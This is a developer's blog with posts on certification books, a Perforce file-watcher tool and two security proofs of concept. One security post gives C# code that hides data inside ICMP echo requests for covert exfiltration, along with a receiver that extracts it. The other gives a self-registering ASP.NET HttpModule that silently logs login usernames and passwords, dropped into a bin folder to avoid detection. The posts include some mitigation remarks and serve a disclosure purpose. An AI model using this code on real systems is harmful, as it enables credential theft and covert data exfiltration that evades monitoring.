MCTS Self-Paced Training Kit (Exam 70-516): Accessing Data with Microsoft .NET Framework 4

MCPD 70-519 Exam Ref: Designing and Developing Web Applications Using Microsoft .NET Framework 4

If you took the 70-536 exam (a number I won't forget, because it took me a long time to prepare for it, and the number of questions about pieces of the Framework I had never used was amazing), you might have read this book. It was written by the same guy who wrote the last book listed above, Tony Northrup.

One thing worth mentioning: I was surprised by the number of errors in the 70-519 book by Tony Northrup, but since it was the first release (5 months ago), it's understandable. I enjoy reading his books, but I was hoping for better from the Microsoft Press review people.

Sunday, March 11, 2012

ICMP for stealth transport of data

ICMP (Internet Control Message Protocol) has been used for data transfer for a long time. Known as an ICMP tunnel, there are several projects and articles about it, mainly open source, like ICMP-Chat for Unix-like systems, which is about 10 years old now. There is also an interesting article explaining how to tunnel TCP over ICMP with a simple command-line tool for Unix-like environments, also ported to Windows.

In case you are not familiar with the idea, a description from Wikipedia follows:

"ICMP tunneling works by injecting arbitrary data into an echo packet sent to a remote computer."
"This vulnerability exists because RFC 792, which is IETF's rules governing ICMP packets, allows for an arbitrary data length for any type 0 (echo reply) or 8 (echo message) ICMP packets."

It is correct to say that ICMP is normally not considered a threat, at least not by the majority of network administrators. It's common to add security mechanisms (IDS, IPS, appliances, etc.) to a corporate network, but in the end all types of ICMP packets, with all payload sizes, pass freely, at least from within the private network to the outside world. This technique is used to send sensitive data out of a private network without relying on SMTP, HTTP or other upper-layer protocols that are commonly monitored and logged.

The Sender:

The sender has a very simple implementation. Considering the objective is to send data to the outside world, the reply is actually irrelevant: the Sender code doesn't need to handle replies at all.

At first I started writing the Sender code with raw sockets, having lots of fun using binary operators (<<, >>, ~, etc.), writing one's complement and reading RFC 792. Then I found the code would only run when executing as administrator. The whole idea wouldn't make much sense if the Sender process required elevated privileges; the ASP.NET Application Pool, for example, wouldn't be able to run it by default. And the worst part is that this is nothing new at all: SOCK_RAW access has been blocked for non-administrator users, as described by this Microsoft knowledge base article, since Windows NT 4.0, which means always.

I can still remember writing ICMP type 8 (echo request) packets with custom payloads about 4 years ago, with C#, without writing that much code. So I tried the Ping class, introduced in .Net Framework 2.0, only to find a third parameter of type byte[] called buffer on the Send method: Great! That's the payload. So this is the way to go.

A quick test with:

new System.Net.NetworkInformation.Ping().Send("www.google.com", 5000, payload);

On Microsoft Network Monitor I see:

Custom ICMP payload
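Spelled out a bit more, the quick test looks like this (host name, timeout and message text are placeholders): the Ping class does all the ICMP framing, and the byte[] argument of Send becomes the echo request data field.

```csharp
using System.Net.NetworkInformation;
using System.Text;

static class IcmpSender
{
    // Turns a text message into the ICMP echo request data field.
    public static byte[] BuildPayload(string message)
    {
        return Encoding.ASCII.GetBytes(message);
    }

    // Sends one echo request carrying the message. The reply is ignored,
    // which is the whole point: the Sender never needs elevated privileges.
    public static void Send(string host, string message)
    {
        using (var ping = new Ping())
        {
            ping.Send(host, 5000, BuildPayload(message));
        }
    }
}
```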

The Receiver:

Working with ICMP is not the same as standard TCP or UDP sockets. We don't need to Bind a socket to a logical port so the operating system knows which software will handle the packets. To better describe this, I will quote a paper from SANS institute:

"Although ICMP messages are sent in IP packets and it uses IP as if it were a higher-level protocol, ICMP is in fact an internal part of IP, and must be implemented in every IP module."

Because of this behavior, monitoring processes and the TCP or UDP ports they use is pointless against this technique.

When implementing the Receiver part of this PoC, I used Microsoft Network Monitor 3.4, which has an API and already comes with a wrapper class in C# called NetmonAPI.cs. So if you want to run this code, install Microsoft Network Monitor, and add NetmonAPI.cs to your project.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
using System.Text;
using Microsoft.NetworkMonitor;

namespace BrunoGarcia.Net
{
    /// <summary>
    /// Captures ICMP packets of type Echo Request with their payload
    /// </summary>
    public unsafe sealed class IcmpPayloadCapturer : IDisposable
    {
        readonly IcmpPayloadCaptured _payloadCapturedCallback;
        readonly CaptureCallbackDelegate _captureHandler;
        readonly List<uint> _adapterIndex = new List<uint>();
        readonly NmCaptureMode _captureMode;
        readonly int _icmpPayloadBufferSize;
        bool _isDisposed;
        uint _icmpFilterId, _icmpPayloadFieldId, _sourceIpFieldId, _icmpTypeFieldId;
        IntPtr _engineHandle, _frameParserHandle, _nplParserHandle, _configParserHandle;

        public delegate void IcmpPayloadCaptured(IPAddress sourceAddress, string payload);

        /// <summary>
        /// Monitors NICs for ICMP packets
        /// </summary>
        /// <param name="payloadCaptured">Delegate called when ICMP type 8 is captured and its payload extracted</param>
        /// <param name="icmpPayloadBufferSize">Buffer size when reading the ICMP data field</param>
        /// <param name="captureMode">Capture mode: this computer only, or anything it can listen to from a network adapter</param>
        public IcmpPayloadCapturer(IcmpPayloadCaptured payloadCaptured, int icmpPayloadBufferSize = 2048,
            NmCaptureMode captureMode = NmCaptureMode.LocalOnly)
        {
            _payloadCapturedCallback = payloadCaptured;
            _icmpPayloadBufferSize = icmpPayloadBufferSize;
            _captureHandler = new CaptureCallbackDelegate(CaptureCallback);
            _captureMode = captureMode;
        }

        /// <summary>
        /// Starts capture of ICMP Echo Request payload
        /// </summary>
        /// <param name="adapters">Network Interfaces to intercept</param>
        public void Start(IEnumerable<NetworkInterface> adapters)
        {
            if (_isDisposed)
                throw new ObjectDisposedException(GetType().FullName);

            if (NetmonAPI.NmOpenCaptureEngine(out _engineHandle) != 0)
                throw new Exception(@"Failed to load Capture Engine. Make sure you have:
Program running in Single Threaded Apartment (STA)
Microsoft Network Monitor 3.3 or later installed!");

            ConfigureParser();
            ConfigureAdapters(_engineHandle, adapters);
        }

        void ConfigureParser()
        {
            NetmonAPI.NmLoadNplParser(null, NmNplParserLoadingOption.NmAppendRegisteredNplSets, null, IntPtr.Zero, out _nplParserHandle);
            NetmonAPI.NmCreateFrameParserConfiguration(_nplParserHandle, null, IntPtr.Zero, out _configParserHandle);

            NetmonAPI.NmAddFilter(_configParserHandle, "Protocol.ICMP", out _icmpFilterId);
            NetmonAPI.NmAddField(_configParserHandle, "ICMP.Type", out _icmpTypeFieldId);
            NetmonAPI.NmAddField(_configParserHandle, "IPv4.SourceAddress", out _sourceIpFieldId);
            NetmonAPI.NmAddField(_configParserHandle, "ICMP.EchoReplyRequest.ImplementationSpecificData", out _icmpPayloadFieldId);

            NetmonAPI.NmCreateFrameParser(_configParserHandle, out _frameParserHandle, NmFrameParserOptimizeOption.ParserOptimizeFull);
        }

        void ConfigureAdapters(IntPtr engineHandle, IEnumerable<NetworkInterface> adapters)
        {
            var adapterInfo = new NM_NIC_ADAPTER_INFO { Size = (ushort)Marshal.SizeOf(typeof(NM_NIC_ADAPTER_INFO)) };

            uint adapterCount;
            NetmonAPI.NmGetAdapterCount(engineHandle, out adapterCount);

            for (uint i = 0; i < adapterCount; i++)
            {
                NetmonAPI.NmGetAdapter(engineHandle, i, ref adapterInfo);
                if (adapters.Any(p => p.Id == string.Concat(adapterInfo.Guid.Take(38))))
                {
                    NetmonAPI.NmConfigAdapter(engineHandle, i, _captureHandler, IntPtr.Zero,
                        NmCaptureCallbackExitMode.DiscardRemainFrames);

                    if (NetmonAPI.NmStartCapture(engineHandle, i, _captureMode) == 0)
                        _adapterIndex.Add(i); // remember started captures so Dispose can stop them
                }
            }
        }

        void CaptureCallback(IntPtr captureEngine, UInt32 adapterIndex, IntPtr callerContext, IntPtr rawFrame)
        {
            IntPtr parsedFrame, insertedRawFrame; // insertedRawFrame is used by reassembly, which only works on saved data. Will always be -1 here.
            if (NetmonAPI.NmParseFrame(_frameParserHandle, rawFrame, uint.MinValue, 
                NmFrameParsingOption.None, out parsedFrame, out insertedRawFrame) == 0)
            {
                bool passed;
                NetmonAPI.NmEvaluateFilter(parsedFrame, _icmpFilterId, out passed);
                if (passed)
                    ParseIcmpPacket(parsedFrame);

                NetmonAPI.NmCloseHandle(parsedFrame);
                parsedFrame = IntPtr.Zero;
            }
            NetmonAPI.NmCloseHandle(rawFrame);
            rawFrame = IntPtr.Zero;
        }

        void ParseIcmpPacket(IntPtr parsedFrame)
        {
            ushort icmpType;
            NetmonAPI.NmGetFieldValueNumber16Bit(parsedFrame, _icmpTypeFieldId, out icmpType);

            if (icmpType == 8) // Echo Request
            {
                var bytes = new byte[_icmpPayloadBufferSize];
                fixed (byte* buffer = &bytes[0])
                {
                    uint size;
                    NetmonAPI.NmGetFieldValueByteArray(parsedFrame, _icmpPayloadFieldId, (uint)_icmpPayloadBufferSize, buffer, out size);
                    uint sourceIp;
                    NetmonAPI.NmGetFieldValueNumber32Bit(parsedFrame, _sourceIpFieldId, out sourceIp);

                    _payloadCapturedCallback(
                        new IPAddress(sourceIp),
                        Encoding.ASCII.GetString(bytes, 0, (int)size));
                }
            }
        }

        public void Dispose()
        {
            Dispose(true);
        }

        private void Dispose(bool isDispose)
        {
            if (!_isDisposed)
            {
                _isDisposed = true;

                _adapterIndex.ForEach(i => NetmonAPI.NmStopCapture(_engineHandle, i));

                _engineHandle = _frameParserHandle = _nplParserHandle = _configParserHandle = IntPtr.Zero;

                if (isDispose)
                    GC.SuppressFinalize(this);
            }
        }
    }
}

Running from the console without Run as Administrator:

Sending and Reading custom ICMP payload

Obviously, running the two portions of the code on the same computer does not show clearly what goes on behind the scenes. But note that there is nothing handling the reply in the Ping code (the Sender part): the Sender thread is pinging Google but doesn't know about the reply at all. The Receiver code, running on a different thread and using the Microsoft Network Monitor 3.4 API, is intercepting all ICMP type 8 packets and parsing their data field.

Now, adding the Sender portion to an HttpModule as I mentioned in a previous post, an attacker could send sensitive data to another peer via simple ICMP echo requests. The data could be scrambled with a simple XOR, ciphered with a symmetric-key algorithm using a hardcoded password, or asymmetrically with a public key. Breaking large data into small chunks would avoid fragmentation (remember the MTU for Ethernet is 1500 bytes) and suspiciously big ICMP packets. Reordering the data on the Receiver side gives great possibilities for data transfer. Even an ICMP chat for Windows could be done; as mentioned in the introduction, one exists for Unix-like systems.
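The chunking described above is only a few lines of code. A sketch (the 1400-byte default is an arbitrary value chosen to stay safely under the 1500-byte Ethernet MTU, and the sequence-number prefix is one possible convention, not a standard):

```csharp
using System;
using System.Collections.Generic;

static class Chunker
{
    // Splits data into numbered chunks: a 4-byte sequence number
    // followed by up to chunkSize payload bytes. The Receiver can
    // sort by sequence number and concatenate to rebuild the data.
    public static IEnumerable<byte[]> Split(byte[] data, int chunkSize = 1400)
    {
        var sequence = 0;
        for (var offset = 0; offset < data.Length; offset += chunkSize)
        {
            var size = Math.Min(chunkSize, data.Length - offset);
            var chunk = new byte[4 + size];
            BitConverter.GetBytes(sequence++).CopyTo(chunk, 0);
            Array.Copy(data, offset, chunk, 4, size);
            yield return chunk;
        }
    }
}
```

Each chunk then becomes the payload of one echo request, exactly as in the Sender code.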


On Wikipedia mitigation section, I found:

"Although the only way to prevent this type of tunneling is to block ICMP traffic altogether, this is not realistic for a production or real-world environment. One method for mitigation of this type of attack is to only allow fixed sized ICMP packets through firewalls to virtually eliminate this type of behavior."

I disagree that allowing only fixed-size ICMP packets would prevent an ICMP tunnel, since the data can be broken into smaller, fixed-size chunks and reassembled by the Receiver. Using the code I created as a PoC, we can easily change the size of the data, even writing fixed-size data, by adding one layer to control sequence numbering, offset, etc. We could also change the ICMP type, using Destination Unreachable or any other instead of Echo Request. However, considering the idea here is the theft of information, sent from within the network (behind NAT, for example) to an external system that will probably receive and log data not from one but from several compromised systems, Echo Request fits perfectly.

It's true that there are applications and other protocols that rely on ICMP to work properly. The impact of blocking ICMP completely should be assessed before taking such action. Still, it should be blocked when not needed, with firewall rules to allow it in each particular case where it is required.

Wednesday, February 22, 2012

HttpModules. Now even easier to be misused.

Attacks like DDoS or simple web defacements are just vandalism, and for sure quite annoying. However, what is considered a serious threat is when skilled attackers target one application (or one company) looking for specific information. They dig until they find a security hole, escalate privileges, and once they have access to one server, they begin to obtain access to other computer systems within that network.

What does it have to do with HttpModules?

HttpModules give you complete control over the Request, Response, Session, Cache and other modules loaded within your web application. They are required and very useful when building ASP.NET applications.

This great control over the application can also be misused when malicious attackers break into the web application server: all the applications hosted there are compromised. Access to their ConnectionStrings means database access, and in case authentication is forms-based, all password hashes are readable. Bruteforcing against a dictionary, or even using a hash database like this one with over 10 million hashes, would break many of them. But the control HttpModules give you is so big that you actually don't need to worry about hash cracking at all.

HttpModule Overview:

The classic way to build an HttpModule is to create a class within your Web Application project (or at least reference System.Web), implement the IHttpModule interface and add an entry to the web.config, and it works. The registration of the HttpModule is the portion added to the web.config, like:
    <add name="AuditModule" type="BrunoGarcia.AuditModule"/>
HttpModules can easily be plugged into an application in production without rebuilding it or having any access to the source control whatsoever: simply drop the module dll in the bin folder, or put the HttpModule source file in the App_Code folder, which triggers dynamic compilation and recycles the application. But the web.config registration has to be done either way.

With the introduction of ASP.NET MVC 3, came along the Microsoft.Web.Infrastructure assembly. Microsoft has its description on msdn:

The Microsoft.Web.Infrastructure.DynamicModuleHelper contains classes that assist in managing dynamic modules in ASP.NET web pages that use the Razor syntax.

One of the classes within that namespace is: PreApplicationStartMethodAttribute that can be used to make the module registration programmatically. Note that even though it mentions "Razor syntax", what I describe here works with any type of ASP.NET application.

With this, it got even easier, considering the module will register itself. Just make sure the application server has the Microsoft.Web.Infrastructure.dll available, either in the Global Assembly Cache (GAC) or at least under the application's bin folder, and that the application pool is running .Net 4.0. Matt Wrock wrote here, not long ago, about this new functionality, and he ends the post with the section "Is this a good practice?", describing a few concerns about this technique. I'd like to quote this part:

"Well maybe I'm over thinking this but my first concern here is discoverability. In the case of this specific sample, the HttpModule is visibly changing the markup rendered to the browser. I envision a new developer or team inheriting this application and wonder just how long it will take for them to find where this "alteration" is coming from. ... Or perhaps a team member drops in such a module and forgets to tell the team she put it there. I'm thinking that at some point in this story some negative energy will be exerted. Perhaps even a tear shed?"

Now an attacker with write permission on the application's bin folder can inject a module without even changing the web.config, making it even harder to detect that the system was compromised.


To simulate the production system, I created a new project using the ASP.NET Web Application template (which creates a standard Web Forms project), made no changes to the project, built it and hosted it with IIS 7.5.
I created an entry for the loopback address in C:\Windows\System32\drivers\etc\hosts called:
Note that IIS has default settings and the Application Pool is running under ApplicationPoolIdentity, which, as mentioned here, is:

ApplicationPoolIdentity is a Managed Service Account, which is a new concept introduced in Windows Server 2008 R2 and Windows 7.  For more information on Managed Service Accounts, please see the following link:

For this PoC I thought of simply intercepting all requests and, in case of a POST to the login form, writing the username and password to a file. Writing a file to disk with the permission set the Application Pool has by default doesn't give you many options. However, the ACL on the ASP.NET temp folder allows write access. 
Therefore I picked the path:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files
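If you want to check which folders a given identity can actually write to, the simplest test is to just try. A small sketch (this probe helper is mine, not part of the PoC):

```csharp
using System;
using System.IO;

static class WriteProbe
{
    // Returns true if the current identity can create and delete a file
    // in the given folder - the same assumption the PoC relies on for
    // the ASP.NET temp folder.
    public static bool CanWrite(string folder)
    {
        try
        {
            var probe = Path.Combine(folder, Path.GetRandomFileName());
            File.WriteAllText(probe, "probe");
            File.Delete(probe);
            return true;
        }
        catch (UnauthorizedAccessException) { return false; }
        catch (IOException) { return false; }
    }
}
```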

Then comes the module:
using System;
using System.IO;
using System.Web;
using System.Web.Hosting;
using Microsoft.Web.Infrastructure.DynamicModuleHelper;

[assembly: PreApplicationStartMethod(typeof(RequestInterceptorModule), "Run")]
public class RequestInterceptorModule : IHttpModule
{
    public static void Run()
    {
        // Self-registration: no web.config entry needed.
        DynamicModuleUtility.RegisterModule(typeof(RequestInterceptorModule));
    }

    public void Dispose() { }

    const string myFile = @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\HttpModulePoC";
    static readonly object @lock = new object();

    public void Init(HttpApplication context)
    {
        context.BeginRequest += new EventHandler(context_BeginRequest);

        File.AppendAllText(myFile,
            string.Format("{0} Module initialized for application {1}\r\n",
                DateTime.Now, HostingEnvironment.SiteName));
    }

    void context_BeginRequest(object sender, EventArgs e)
    {
        var app = sender as HttpApplication;
        if (app.Request.RequestType == "POST"
            && Path.GetFileName(app.Request.PhysicalPath) == "Login.aspx")
        {
            lock (@lock)
            {
                // Form field names below are from the default Web Forms
                // template's Login control.
                File.AppendAllText(myFile, string.Format("{0} - Login: {1} - Password: {2}\r\n",
                    DateTime.Now,
                    app.Request.Form["ctl00$MainContent$LoginUser$UserName"],
                    app.Request.Form["ctl00$MainContent$LoginUser$Password"]));
            }
        }
    }
}
I built this class in its own project; a 6 KB dll file was created and I just copied it to the hosted application's (HttpModulePoC) bin folder.

Then I browse:

When I hit the server, the application pool process starts, the module loads itself, subscribes to the BeginRequest event and writes to the file:
21/02/2012 16:32:45 Module initialized for application HttpModulePoC

Click the Login link, enter a username and password and click Log In:

In the file I see:
21/02/2012 16:32:58 - Login: myUsername - Password: myPassword

This is just an example of what could be done. Think of having complete access to Cache, User Session, Request, Response and more. So much can be done.

Monitoring loaded modules:

As I mentioned above, before the introduction of PreApplicationStartMethodAttribute, creating custom modules required registration in web.config, so simply monitoring the configuration files was enough. Now a different approach has to be used.
Before injecting my module into the HttpModulePoC application, I enumerated the loaded modules with:


I got the following 15 items:


Mitigation could be done by writing custom code to compare the allowed modules with the ones actually loaded. In case an unauthorized module is loaded, send an alert (or prevent the application from starting altogether). Alerts could simply be written to the event log or sent by e-mail.
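The comparison itself is trivial once you have the list of loaded module names. A sketch of the check (the allowed list and the alert action are application-specific; in an ASP.NET application the loaded names would come from the HttpApplication.Modules collection):

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

static class ModuleAudit
{
    // Returns the loaded module names that are not on the allowed list.
    // An empty result means nothing unexpected is running.
    public static List<string> Unauthorized(
        IEnumerable<string> loadedModules, IEnumerable<string> allowedModules)
    {
        var allowed = new HashSet<string>(allowedModules, StringComparer.OrdinalIgnoreCase);
        return loadedModules.Where(m => !allowed.Contains(m)).ToList();
    }
}
```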

Obviously, the most important thing is to train the development team to write secure code, and to make sure the system is up to date with security updates from the vendors of the operating system and installed applications. That will minimize the risk of attackers breaking into the application server.

Friday, February 10, 2012

New files on Visual Studio project added to Perforce

I have worked with a few different source control systems. The first was Visual SourceSafe, then CVS and Subversion (SVN), and for two years I was working with Team Foundation Server and its source control. TFS has great integration, just like any other Microsoft products working with each other.

Now I've started working on a project with a different source control: Perforce.
I wouldn't dare talk badly about it; its scalability is quite impressive and it has good features too.
There is also a plugin to integrate your project with Visual Studio which, for example, adds files you add to your Visual Studio project to your pending list on Perforce.

But what if your project is not integrated (or you don't have the plugin)?

Well, that was my case, and it means that every time you add files to your project in Visual Studio, using a wizard for example, you have to open the p4 client, browse to the file and click Mark for Add. Only then are the files shown in your changelist.

Not a problem: every time I add something to the project, I just have to remember to go to p4 and Mark for Add.
Obviously it didn't take long before I forgot to Mark for Add one file, submitted my changes, and the CruiseControl tray application went red. I broke the build!

Foreseeing that this would not be the only occasion, I decided to spend an hour or so on a quick and dirty solution to serve as a patch for this lapse of memory I might occasionally have.

The first thing that popped into my head was parsing the csproj file (and the .sln too, in case I add a new project). That would probably take some time to get working well, and to know when it changed I would have to monitor it anyway. So I decided that monitoring the project folder with FileSystemWatcher had the best effort/benefit ratio.

Considering my layout skills are great, I decided not to try to make a UI! :)
Well, there is a context menu, since defining the paths to monitor and the regular expressions to ignore is required to make it work.

Paths that match one of these regexes are ignored

But let's ignore that part and see it working:
I select Add file within Visual Studio, the file is written to disk, and I immediately get the popup, on top of Visual Studio:

Notification that a file was added. Hit Enter to add it to your changelist within Perforce.
Apart from the UI-related code, which stayed in the Form1 code-behind, there's only 1 class (as I mentioned, quick and dirty) that does the business. For each path you specify to be monitored, a new instance is created:

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text.RegularExpressions;
using System.Windows.Forms;

namespace AddToPerforce
{
    internal class Watcher : IDisposable
    {
        private IEnumerable<string> _exceptions { get; set; }
        private FileSystemWatcher _fileWatchers = null;

        public string PathToMonitor { get; private set; }

        public Watcher(IEnumerable<string> exceptions, string pathToMonitor)
        {
            _exceptions = exceptions;
            PathToMonitor = pathToMonitor;
        }

        public void Start()
        {
            _fileWatchers = new FileSystemWatcher(PathToMonitor);
            _fileWatchers.Created += CreatedHandler;
            _fileWatchers.Error += (s, e) => MessageBox.Show(string.Format("Error has occurred: {0}", e.GetException().Message));
            _fileWatchers.EnableRaisingEvents = _fileWatchers.IncludeSubdirectories = true;
        }

        public bool PauseContinue()
        {
            return _fileWatchers.EnableRaisingEvents = !_fileWatchers.EnableRaisingEvents;
        }

        void CreatedHandler(object sender, FileSystemEventArgs e)
        {
            if (_exceptions.Any(p => Regex.IsMatch(e.FullPath, p))) return;

            var msg = string.Format(@"File created: 

{0}

Do you want to add it to your Perforce changelist?", e.FullPath);

            if (DialogResult.Yes == MessageBox.Show(msg, "File added!", MessageBoxButtons.YesNo))
                Process.Start("p4", string.Format("add -f -c default \"{0}\"", e.FullPath));
        }

        public void Dispose()
        {
            if (_fileWatchers != null)
                _fileWatchers.Dispose();
        }
    }
}
So now, every time I add a file to the project (or any file is written in a path I set up to be monitored), I get that notification where I can choose to add the file to my Perforce changelist.

You can download the sources here.